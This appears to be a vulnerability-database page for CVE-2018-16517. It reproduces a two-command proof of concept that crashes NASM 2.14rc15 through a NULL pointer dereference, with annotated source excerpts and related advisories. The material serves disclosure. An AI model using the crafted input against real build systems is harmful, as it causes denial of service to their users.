Vulners
Lucene search
Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference Exploit | 18 Apr 201900:00 | – | zdt |
 | Netwide Assembler Null Pointer Dereference Vulnerability | 7 Sep 201800:00 | – | cnvd |
 | CVE-2018-16517 | 6 Sep 201823:00 | – | cve |
 | CVE-2018-16517 | 6 Sep 201823:00 | – | cvelist |
 | CVE-2018-16517 | 6 Sep 201823:00 | – | debiancve |
 | Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC) | 18 Apr 201900:00 | – | exploitdb |
 | EUVD-2018-8326 | 7 Oct 202500:30 | – | euvd |
 | Updated nasm packages fix security vulnerability | 31 Jul 202023:25 | – | mageia |
 | CVE-2018-16517 | 6 Sep 201823:29 | – | nvd |
 | openSUSE Security Update : nasm (openSUSE-2020-952) | 20 Jul 202000:00 | – | nessus |
10
# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517
asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
PoC:
1. echo "equ push rax" > poc
2. nasm -f elf poc
insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().
[...]
if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken
/* there's a label here */
first = false;
result->label = tokval.t_charptr;
i = stdscan(NULL, &tokval);
if (i == ':') { /* skip over the optional colon */
i = stdscan(NULL, &tokval);
} else if (i == 0) {
nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
"label alone on a line without a colon might be in error");
}
if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
/*
* FIXME: location.segment could be NO_SEG, in which case
* it is possible we should be passing 'absolute.segment'. Look into this.
* Work out whether that is *really* what we should be doing.
* Generally fix things. I think this is right as it is, but
* am still not certain.
*/
define_label(result->label,
in_absolute ? absolute.segment : location.segment,
location.offset, true);
[...]
static bool islocal(const char *l)
{
if (tasm_compatible_mode) {
if (l[0] == '@' && l[1] == '@')
return true;
}
return (l[0] == '.' && l[1] != '.'); <-- boom
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2019 00:00Current
EPSS0.01508